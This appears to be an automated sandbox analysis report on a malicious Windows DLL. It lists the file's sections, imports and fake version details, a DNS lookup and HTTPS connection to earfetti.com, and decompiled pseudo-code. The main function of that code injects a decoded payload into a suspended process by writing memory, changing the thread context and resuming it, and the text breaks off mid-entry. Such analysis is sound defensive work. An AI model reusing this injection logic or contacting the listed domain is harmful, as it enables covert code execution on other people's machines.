.rdata | 0x45000 | 0x124c5 | 0x12600 | False | 0.576570471939 | data | 6.42887953464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x58000 | 0x131c4 | 0x1800 | False | 0.326822916667 | data | 4.20462332091 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x6c000 | 0x518 | 0x600 | False | 0.376953125 | data | 2.9425525328 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6d000 | 0x257e | 0x2600 | False | 0.490748355263 | data | 4.89739942249 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_STRING | 0x6c3e0 | 0x138 | data | English | United States
RT_VERSION | 0x6c0a0 | 0x340 | data | English | United States

Imports

DLL | Import
KERNEL32.dll | GetFileAttributesA, GetTempFileNameA, CopyFileA, GetShortPathNameA, GetEnvironmentVariableA, WaitForMultipleObjects, QueryPerformanceCounter, CreateFileA, GetWindowsDirectoryA, GetSystemTime, OpenProcess, GetVersionExA, GetModuleHandleA, GetDateFormatA, SizeofResource, LoadResource, Sleep, GetCurrentDirectoryA, VirtualProtect, FindFirstChangeNotificationA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetFileAttributesA, GetLastError, DuplicateHandle, GetCurrentProcess, CloseHandle, HeapFree, HeapReAlloc, HeapAlloc, RtlUnwind, GetCurrentThreadId, GetCommandLineA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetStdHandle, EnterCriticalSection, LeaveCriticalSection, GetFileType, SetHandleCount, GetStdHandle, GetStartupInfoA, DeleteCriticalSection, GetProcAddress, WriteFile, GetModuleFileNameA, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, ExitProcess, RaiseException, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, SetFilePointer, SetEndOfFile, GetProcessHeap, ReadFile, LoadLibraryA, GetLocaleInfoA, GetStringTypeA, GetStringTypeW
WINSPOOL.DRV | GetJobA, EnumPrintersA, GetPrinterDataA, AddPrinterConnectionA, OpenPrinterA, DocumentPropertiesA, ClosePrinter

Exports

Name | Ordinal | Address
Knowequal | 1 | 0x10031210

Version Infos

Description | Data
LegalCopyright | Copyright 2006, Pound sense Blackmiss
InternalName | Rain.dll
FileVersion | 2.8.7.867
CompanyName | Pound sense
LegalTrademarks | Trade shout
Comments | http://www.enoughthose.de
ProductName | Trade shout Modernplant
ProductVersion | 2.8.7.867
FileDescription | Trade shout
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 14, 2021 15:14:49.401484966 CET | 192.168.2.3 | 8.8.8.8 | 0xdde | Standard query (0) | earfetti.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 14, 2021 15:14:33.475251913 CET | 8.8.8.8 | 192.168.2.3 | 0xd5be | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Feb 14, 2021 15:14:49.471363068 CET | 8.8.8.8 | 192.168.2.3 | 0xdde | No error (0) | earfetti.com | | 104.21.45.75 | A (IP address) | IN (0x0001)
Feb 14, 2021 15:14:49.471363068 CET | 8.8.8.8 | 192.168.2.3 | 0xdde | No error (0) | earfetti.com | | 172.67.211.56 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 14, 2021 15:14:49.666114092 CET | 104.21.45.75 | 443 | 192.168.2.3 | 49728 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Thu Jan 28 01:00:00 CET 2021 | Fri Jan 28 00:59:59 CET 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
 | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | |

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:15:13:59
Start date:14/02/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\ERRoqGpsIS.dll'
Imagebase:0x150000
File size:121856 bytes
MD5 hash:99D621E00EFC0B8F396F38D5555EB078
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:15:14:44
Start date:14/02/2021
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:msiexec.exe
Imagebase:0x12a0000
File size:59904 bytes
MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis


    Executed Functions

    C-Code - Quality: 90%
    			E6E4CDD00(signed char __edx, void* __eflags) {
    				signed int _v20;
    				void* _v24;
    				long _v28;
    				long _v32;
    				void* _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				struct _PROCESS_INFORMATION _v68;
    				void* _v72;
    				signed int _v76;
    				intOrPtr _v114;
    				char _v115;
    				char _v129;
    				signed int _v133;
    				char _v134;
    				long _v138;
    				char _v139;
    				void* _v143;
    				void _v144;
    				char _v156;
    				char _v171;
    				struct _CONTEXT _v888;
    				char _v1408;
    				void* __ebx;
    				void* __edi;
    				signed int _t93;
    				void* _t104;
    				void* _t105;
    				signed int _t107;
    				void* _t110;
    				int _t114;
    				void* _t117;
    				signed char _t118;
    				void* _t124;
    				int _t130;
    				signed char _t131;
    				long _t134;
    				long _t135;
    				long _t136;
    				void* _t137;
    				void* _t140;
    				void* _t148;
    				void* _t150;
    				int _t154;
    				void* _t155;
    				CONTEXT* _t156;
    				int _t159;
    				long _t161;
    				signed char _t164;
    				int _t166;
    				int _t173;
    				signed char _t182;
    				void* _t186;
    				void* _t187;
    				void* _t191;
    				signed int _t192;
    				void* _t194;
    				signed int _t198;
    				intOrPtr _t218;
    				struct _STARTUPINFOA* _t219;
    				long _t220;
    				long _t222;
    				signed int _t224;
    				void* _t231;
    				void* _t245;
    
    				_t272 = __eflags;
    				_t216 = __edx;
    				E6E4BC760(__eflags); // executed
    				_v52 =  *0x6e4d50e4 * 0x129;
    				E6E4BCD90(_t272); // executed
    				_t93 = _v52;
    				_t198 = _t93 ^ 0x00000008;
    				_v76 = _t198;
    				_v52 = _t198 | _t93;
    				E6E4B5D80(_t272); // executed
    				E6E4BB7E0(_t272); // executed
    				E6E4B7830(_t272); // executed
    				E6E4B43A0(_t272); // executed
    				_t225 = 0xffffffff;
    				if(E6E4CF860() == 0) {
    					return 0xffffffff;
    				}
    				E6E4BAF90();
    				if( *0x6e4d7a64 == 0) {
    					L19:
    					E6E4CF5C0(0, E6E4B8AE0(0xfd7969f));
    					ExitProcess(0);
    				}
    				_t104 = E6E4CF5C0(0, E6E4B8AE0(0x7f471fb));
    				_t225 = _t104;
    				_t218 =  *0x6e4d7a64; // 0x6e4b0000
    				_t105 = E6E4B8AE0(0x82efb88);
    				_t231 = _t231 + 0x10;
    				 *_t104(_t218,  &_v1408, _t105);
    				_t107 =  *0x6e4d7a64; // 0x6e4b0000
    				_v40 = _t107;
    				if(_t107 == 0) {
    					goto L19;
    				}
    				_t219 =  &_v144;
    				E6E4BAF10(_t219, 0x44);
    				_v144 = 0x44;
    				_t110 = E6E4B1250(0x6e4d38a8,  &_v156);
    				_t225 =  &_v888;
    				E6E4B59B0(_t225, _t110, 0xffffffff);
    				E6E4CF5C0(0, E6E4B8AE0(0x9cf9acd));
    				_t231 = _t231 + 0x28;
    				_t114 = CreateProcessA(0, _t225, 0, 0, 0, 4, 0, 0, _t219,  &_v68); // executed
    				if(_t114 != 1) {
    					goto L19;
    				}
    				_t220 = E6E4C32B0(_v40);
    				E6E4CF5C0(0, 0x8cae838);
    				_t117 = VirtualAllocEx(_v68.hProcess, 0, _t220, 0x3000, 4); // executed
    				_t187 = _t117;
    				_t118 = E6E4B5BF0(_t117, 0);
    				_t231 = _t231 + 0x14;
    				_t277 = _t118 & 0x00000001;
    				if((_t118 & 0x00000001) != 0) {
    					goto L19;
    				}
    				 *(E6E4C6270() + 0x49c) = _t187;
    				E6E4D29B0(_t225, _t277,  &_v1408);
    				E6E4BE4D0(_t225);
    				E6E4D2960(_t225);
    				_v28 = _t220;
    				_t221 = _v40;
    				_t124 = E6E4CD230(_v40, _t220); // executed
    				_t225 = _t124;
    				E6E4B9560(_t124, _v40);
    				_v36 = _t187;
    				E6E4B6340(_t187, _t221, _t277, _t225, _t187);
    				_t245 = _t231 + 0x1c;
    				_v48 = E6E4C88F0(_t277);
    				if(_v28 == 0) {
    					L8:
    					_v32 = 0;
    					E6E4CF5C0(0, E6E4B8AE0(0x2664a75));
    					_t222 = _v28;
    					_t130 = WriteProcessMemory(_v68.hProcess, _v36, _t225, _t222,  &_v32); // executed
    					_t131 = E6E4B4C00(_t130, 1);
    					_t231 = _t245 + 0x14;
    					if((_t131 & 0x00000001) != 0) {
    						_v20 = E6E4CF5C0(0, 0x8cae838);
    						_v24 = _v68.hProcess;
    						_t134 = E6E4B8AE0(0x82eface);
    						_t135 = E6E4B8AE0(0x82eca8c);
    						_t136 = E6E4B8AE0(0x82efa88);
    						_t231 = _t231 + 0x14;
    						_t225 = _v36;
    						_t137 = VirtualAllocEx(_v24, 0, _t134, _t135, _t136);
    						_t282 = _t137;
    						if(_t137 != 0) {
    							_v144 = 0xbe;
    							_v143 = _t225;
    							_v139 = 0xb9;
    							_v138 = _t222;
    							_v134 = 0xb8;
    							_v133 = _v48;
    							_t140 = E6E4CFCE0( &_v171,  &_v32, _t216, 0x6e4d3ab4, 0xf,  &_v171);
    							_v20 = _t137;
    							E6E4C6ED0( &_v129, _t140, E6E4B8AE0(0x82efa82));
    							_v115 = E6E4B27A0(0x65);
    							_t148 = E6E4B6CC0(_t282, E6E4B6CC0(_t282, E6E4B30FE,  ~_v40), 0xa3bdd5cd);
    							_t191 = _v20;
    							_t150 = E6E4B2640(E6E4B6CC0(_t282, _t148, _t225), 0xa3bdd5cd);
    							_v114 = E6E4B2640(0, _t191) + _t150;
    							E6E4CF5C0(0, 0xa48b0f9);
    							_t231 = _t231 + 0x50;
    							_t225 =  &_v32;
    							_t154 = WriteProcessMemory(_v68.hProcess, _t191,  &_v144, 0x42,  &_v32); // executed
    							if(_t154 == 1) {
    								_t155 = E6E4B8AE0(0x82ef840);
    								_t156 =  &_v888;
    								E6E4BAF10(_t156, _t155);
    								_v888.ContextFlags = 0x10001;
    								E6E4CF5C0(0, 0x4bbc7e4);
    								_t159 = GetThreadContext(_v68.hThread, _t156); // executed
    								_v44 = _t159;
    								_v24 = E6E4CF5C0(0, 0xd1a4de8);
    								_t161 = E6E4B8AE0(0x82eface);
    								_t225 = _t161;
    								_t164 = E6E4B4C00(VirtualProtectEx(_v68.hProcess, _t191, _t161, E6E4B8AE0(0x82efa9c),  &_v32), 1);
    								_t231 = _t231 + 0x2c;
    								if((_t164 & 0x00000001) != 0) {
    									_v888.Eip = _t191;
    									_t192 = 1;
    									if(_v44 == 1) {
    										E6E4CF5C0(0, E6E4B8AE0(0xc947d68));
    										_t231 = _t231 + 0xc;
    										_t173 = SetThreadContext(_v68.hThread,  &_v888); // executed
    										_t192 = 0 | _t173 != 0x00000001;
    									}
    									E6E4CF5C0(0, 0xd1a4de8);
    									_t231 = _t231 + 8;
    									_t166 = VirtualProtectEx(_v68.hProcess, _v36, _v28, 0x40,  &_v32); // executed
    									if(_t166 == 1) {
    										if(_t192 == 0) {
    											E6E4CF5C0(0, 0xb232744);
    											_t231 = _t231 + 8;
    											_push(_v68.hThread);
    										} else {
    											E6E4CF5C0(0, E6E4B8AE0(0xea5eff8));
    											_t231 = _t231 + 0xc;
    											_push(0);
    											_push(0);
    											_push(0);
    											_push(_v20);
    											_push(0);
    											_push(0);
    											_push(_v68);
    										}
    										ResumeThread(); // executed
    									}
    								}
    							}
    						}
    					}
    					goto L19;
    				} else {
    					_t194 = 0;
    					_t224 = _v48;
    					_v72 = _t225;
    					0;
    					do {
    						_t209 =  *(_t225 + _t194) & 0x000000ff;
    						_v24 =  !( *(_t225 + _t194) & 0x000000ff) & 0x0000008f;
    						_v44 = E6E4B2120(0x8f, 0xff);
    						_t225 = _v72;
    						_v20 = E6E4B7740(0, _t209, _t177 & 0x000000ff);
    						_t182 = E6E4B7740(0,  !_t224 & 0x000000ff, 0x8f);
    						_t216 = _v44 & 0x000000ff & _t224;
    						_v20 = _v20 & 0x000000ff | _v24;
    						 *(_t225 + _t194) = E6E4B9950(_t182 & 0x000000ff, _v44 & 0x000000ff & _t224 & 0x000000ff) ^ _v20;
    						asm("rol edi, 0x8");
    						_t186 = E6E4B6CC0(0, _t194 + 0x26251827, 1);
    						_t245 = _t245 + 0x28;
    						_t194 = _t186 + 0xd9dae7d9;
    					} while (_t194 != _v28);
    					goto L8;
    				}
    			}

    APIs
    • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 6E4CDE54
    • WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6E4CDFA9
    • VirtualAllocEx.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 6E4CE00C
    • WriteProcessMemory.KERNELBASE(?,?,000000BE,00000042,00000000), ref: 6E4CE0F6
    • GetThreadContext.KERNELBASE(?,?), ref: 6E4CE13D
    • VirtualProtectEx.KERNELBASE(?,?,00000000,00000000,00000000), ref: 6E4CE17B
    • SetThreadContext.KERNELBASE(?,00010001), ref: 6E4CE1C4
    • VirtualProtectEx.KERNELBASE(?,?,00000000,00000040,00000000), ref: 6E4CE1EC
    • ResumeThread.KERNELBASE(?), ref: 6E4CE233
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6E4CDE20
      • Part of subcall function 6E4CF5C0: LoadLibraryA.KERNEL32(?), ref: 6E4CF82C
    • ExitProcess.KERNEL32(00000000), ref: 6E4CE24F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: ProcessVirtual$Thread$AllocContextMemoryProtectWrite$CreateExitLibraryLoadResume
    • String ID: D
    • API String ID: 1100182367-2746444292
    • Opcode ID: 0aa73867ac6de16adf09671ee0da585b14596ba1b20eb981206d224fcbeb767c
    • Instruction ID: 024144ac7994e44b2d8fe27424d7580089530518ef701a2d375139ad3a456312
    • Opcode Fuzzy Hash: 0aa73867ac6de16adf09671ee0da585b14596ba1b20eb981206d224fcbeb767c
    • Instruction Fuzzy Hash: BAD1F8B5D402156AEB109BF4AC42FFE767CAF19609F14086AF909B7281FB715A0487F3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00000913,00003000,00000040,00000913,6E509D50), ref: 6E50A3B4
    • VirtualAlloc.KERNEL32(00000000,000001D9,00003000,00000040,6E509DB0), ref: 6E50A3EB
    • VirtualAlloc.KERNEL32(00000000,00021FD4,00003000,00000040), ref: 6E50A44B
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E50A481
    • VirtualProtect.KERNEL32(6E4B0000,00000000,00000004,6E50A2D6), ref: 6E50A586
    • VirtualProtect.KERNEL32(6E4B0000,00001000,00000004,6E50A2D6), ref: 6E50A5AD
    • VirtualProtect.KERNEL32(00000000,?,00000002,6E50A2D6), ref: 6E50A67A
    • VirtualProtect.KERNEL32(00000000,?,00000002,6E50A2D6,?), ref: 6E50A6D0
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E50A6EC
    Memory Dump Source
    • Source File: 00000000.00000002.302129642.000000006E509000.00000040.00020000.sdmp, Offset: 6E509000, based on PE: false
    Similarity
    • API ID: Virtual$Protect$Alloc$Free
    • String ID:
    • API String ID: 2574235972-0
    • Opcode ID: c06b1477aa61c87ccc77a10075d73aabdf839f5567d94571a5fcb8cd98cfae2b
    • Instruction ID: c834e78a3b1939026c0aee10a3e42989f381f13a61ee239955eec77000e7e952
    • Opcode Fuzzy Hash: c06b1477aa61c87ccc77a10075d73aabdf839f5567d94571a5fcb8cd98cfae2b
    • Instruction Fuzzy Hash: D3D113736002029FEF168F94CC80B6577E5BF88310B0A8594FD8DAF25ED771AE11AB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4B2B90(void* __eflags) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v30;
    				signed int _v36;
    				signed int _t69;
    				signed int _t70;
    				signed int _t73;
    				signed int _t74;
    				signed int _t78;
    				signed int _t79;
    				signed int _t84;
    				signed int _t88;
    				intOrPtr _t90;
    				signed int _t99;
    				intOrPtr _t101;
    				signed int _t102;
    				signed int _t108;
    				signed int _t111;
    				signed int _t114;
    				signed int _t115;
    				signed int _t118;
    				signed int _t120;
    				signed int _t121;
    				signed int _t124;
    				signed int _t127;
    				signed int _t129;
    				signed int _t131;
    				signed int _t135;
    				signed int _t138;
    				signed int _t139;
    				void* _t141;
    
    				_v12 =  *0x6e4d50b0 | 0x00000001;
    				E6E4B8BF0(); // executed
    				_v8 = _v12 * 0x372;
    				E6E4CF840();
    				_t69 = _v8;
    				_t118 = _v12 & _t69;
    				_t70 = _t69 * _t118;
    				_v8 = _t70;
    				_v12 = _t70 * _t118;
    				E6E4B3420();
    				_t73 = _v12;
    				_t120 = _v8 * _t73;
    				_t74 = _t73 & _t120;
    				_t121 = _t120 * _t74;
    				_v8 = _t121;
    				_v12 = _t121 * _t74;
    				E6E4CFC90(E6E4B6A40());
    				_t78 = _v12 ^ _v8;
    				_t124 = _t78 & 0x00008000;
    				_t79 = _t78 ^ _t124;
    				_v8 = _t79;
    				_v12 = _t79 * _t124;
    				E6E4B80C0();
    				_t127 = _v8 * _v12 | _v12;
    				_t84 = _t127 ^ 0x00000388;
    				_v8 = _t84;
    				_v12 = _t84 & _t127;
    				E6E4CFC90(_t84 & _t127);
    				E6E4B5190();
    				_t88 = _v12;
    				_t129 = _v8 ^ _t88;
    				_v8 = _t129;
    				_t138 = _t129 & _t88;
    				_v16 = _t138;
    				_t139 = _t138 ^ _t88;
    				_v12 = _t139;
    				_v20 = _t139 ^ _t129;
    				E6E4B5260();
    				_t90 =  *0x6e4d50a8; // 0xc75f8678
    				if(_t90 <= _v8 &&  *0x6e4d50b0 <= _v16) {
    					_t111 = _v20;
    					_t135 = (_v12 + _t111) * _v16;
    					_v16 = _t135;
    					_v8 = _t135 - _t111;
    					E6E4CF840();
    					_t114 = _v8 - _v12;
    					_v16 = _t114;
    					_t115 = _t114 + _v20;
    					_v8 = _t115;
    					_v20 = _t115 | 0x00000040;
    				}
    				if( *0x6e4d50a4 == 0xfb8a8f28) {
    					_t101 =  *0x6e4d5000; // 0x1
    					if(_t101 <= _v16) {
    						_t102 = _v20;
    						_t131 = _v16 + _t102;
    						_v8 = _t131;
    						_v16 = _t131 ^ _t102;
    						E6E4B9890(_v12, _t102);
    						_t141 = _t141 + 8;
    						_v8 = 0x4000;
    						_v20 = (0x00004000 | _v16) - _v12;
    						E6E4B2D30();
    						_t108 = _v20 ^ _v16;
    						_v24 = _t108;
    						_v16 = _t108 ^ _v12;
    					}
    				}
    				_v20 = 0x320;
    				_v36 = 0x320;
    				_v24 = 0x320;
    				_v28 = (((0x00000320 + _v16) * _v24 ^ _v8) + 0xfffffe8c) * 0xdc;
    				E6E4CF840();
    				_t99 = _v28 ^ _v20;
    				_v30 = _t99;
    				return _t99;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: CursorEvent$ClipCloseCreateErrorHandleLast
    • String ID:
    • API String ID: 3728218925-0
    • Opcode ID: 8f6d59dd264636154e12579a9c24da10e9747d136a2e1f8c59fff41c8338d0cd
    • Instruction ID: 5cea28015187daaa219bb04e95ed3ba3769c0b78f10ca3a9477adda1ee0e7cab
    • Opcode Fuzzy Hash: 8f6d59dd264636154e12579a9c24da10e9747d136a2e1f8c59fff41c8338d0cd
    • Instruction Fuzzy Hash: 14518375E11209EFCF08DFF4D9959AEBBF9EB49204F1088AAD415EB340E7389B409B54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetCurrentDirectoryA.KERNEL32(000007C7,6E5096C0), ref: 6E4E0CA0
    • Sleep.KERNELBASE(00000088,?,?,?,?,?,?,?,?,?,?,-00000002,?,00000000), ref: 6E4E0FC7
    Strings
    • ", xrefs: 6E4E0C74
    • required="false" variableLength="false">SwitchParameter</command:parameterValue><dev:type> <maml:name>SwitchParameter</maml:name> <maml:uri /> </dev:type> <dev:defaultValue /> </command:parameter></command:parameters>, xrefs: 6E4E0DD8
    • o, xrefs: 6E4E09B1
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CurrentDirectorySleep
    • String ID: "$o$required="false" variableLength="false">SwitchParameter</command:parameterValue><dev:type> <maml:name>SwitchParameter</maml:name> <maml:uri /> </dev:type> <dev:defaultValue /> </command:parameter></command:parameters>
    • API String ID: 16921501-3226252298
    • Opcode ID: 3c6ca5547faf39937576c085157b54561b77f028ec3e0c8892dbdbc94d4fbd4e
    • Instruction ID: 45d618f917e20d9cdf451034cea9dac0b5cc8032db9e013d3b05400fe47f9856
    • Opcode Fuzzy Hash: 3c6ca5547faf39937576c085157b54561b77f028ec3e0c8892dbdbc94d4fbd4e
    • Instruction Fuzzy Hash: 8A5212B3A04A118FDB08CF78C5B1E517BE5AB86305F02412FE5948B791EF749A09CF96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4CFC90(void* __eax) {
    				char _v12;
    				void* _t5;
    
    				_t5 = CreateEventW(0, 1, 0, E6E4BF180(0x6e4d3ac4,  &_v12));
    				if(_t5 != 0) {
    					SetEvent(_t5);
    					_t5 = CloseHandle(_t5); // executed
    				}
    				SetLastError(0);
    				return _t5;
    			}

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8), ref: 6E4CFCAD
    • SetEvent.KERNEL32(00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8,?,?,?,?,?,?,?,6E4BA1E6), ref: 6E4CFCBA
    • CloseHandle.KERNELBASE(00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8,?,?,?,?,?,?,?,6E4BA1E6), ref: 6E4CFCC1
    • SetLastError.KERNEL32(00000000,?,6E4B8C29,?,?,?,?,6E4B2BA8,?,?,?,?,?,?,?,6E4BA1E6), ref: 6E4CFCC9
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: Event$CloseCreateErrorHandleLast
    • String ID:
    • API String ID: 2055590504-0
    • Opcode ID: 3f1697b5095051b370bdc02de7af401dd2731f65bad194c66662675fd544188c
    • Instruction ID: 1b5a70e365496ab9456c9234868f36e806fa7021cdf0c6d9535a9e2f4539ac96
    • Opcode Fuzzy Hash: 3f1697b5095051b370bdc02de7af401dd2731f65bad194c66662675fd544188c
    • Instruction Fuzzy Hash: 88E08676A416487BEF1277F0BC0DFEB7A6CDF05B96F040022FA09D9280EA61951487B6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4B2D30() {
    				char _v8;
    
    				GetConsoleCP();
    				_t1 =  &_v8; // 0x6e4b3565
    				GetFileAttributesW(E6E4BF180(0x6e4d3ac4, _t1));
    				return GetCapture();
    			}

    APIs
    • GetConsoleCP.KERNELBASE(00000000,?,6E4B3565,?,?,?,?,?,?,?,?,?,?,6E4B2BD0), ref: 6E4B2D34
    • GetFileAttributesW.KERNEL32(00000000,?,6E4B3565,?,?,?,?,?,?,?,?,?,?,6E4B2BD0), ref: 6E4B2D4C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: AttributesConsoleFile
    • String ID: e5Kn
    • API String ID: 1533235433-3063621063
    • Opcode ID: 28c4c079c4d312eaafbaab30abe461ed925c9a2f4a692a56e53eeb05b95b9ffe
    • Instruction ID: bab7476ad30b9628c2f2246c3908268bd941fab54b849f4110239952ef134f36
    • Opcode Fuzzy Hash: 28c4c079c4d312eaafbaab30abe461ed925c9a2f4a692a56e53eeb05b95b9ffe
    • Instruction Fuzzy Hash: 2AD012B5C00A0DFBCE027BF4FD0DE9AB76C990251AB040471E90591205E635A61886B6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstChangeNotificationA.KERNELBASE(6E503E70,00000001,00000004,6E5085E0), ref: 6E4E6DCD
    • FindFirstChangeNotificationA.KERNELBASE(6E503E44,00000001,00000020,?,6E503E4C,00000000,00000000), ref: 6E4E6FC2
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ChangeFindFirstNotification
    • String ID:
    • API String ID: 1065410024-0
    • Opcode ID: d37a56262e01407b681d7b8a78ece702a57efc0fc2a14c95047f8f9ad3dbce84
    • Instruction ID: e445d41077b7d286dc4d944911754035359ce830a10883de5fb76a4323f5c2c9
    • Opcode Fuzzy Hash: d37a56262e01407b681d7b8a78ece702a57efc0fc2a14c95047f8f9ad3dbce84
    • Instruction Fuzzy Hash: A5710372904A50CBDF04CFB8C9B5FE97BE4EB1A314F02802EF64997781EA745609CB56
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstChangeNotificationA.KERNELBASE(6E503E44,00000001,00000020,?,6E503E4C,00000000,00000000), ref: 6E4E6FC2
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ChangeFindFirstNotification
    • String ID:
    • API String ID: 1065410024-0
    • Opcode ID: 0617f22dfff94173a352b6c2c7c304ac7c3c6f75fe69ecfe6dc98d2a114f32cb
    • Instruction ID: 93c2d9a4d1f689d7aa4216014cce435c04a7277f83b2e789fa5dcdbe20ce191b
    • Opcode Fuzzy Hash: 0617f22dfff94173a352b6c2c7c304ac7c3c6f75fe69ecfe6dc98d2a114f32cb
    • Instruction Fuzzy Hash: D531E273904E008BDF48CFB8C5B4EA977A1EB56315F02802EF68943781EA351649CB56
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstChangeNotificationA.KERNELBASE(6E503E44,00000001,00000020,?,6E503E4C,00000000,00000000), ref: 6E4E6FC2
    Memory Dump Source
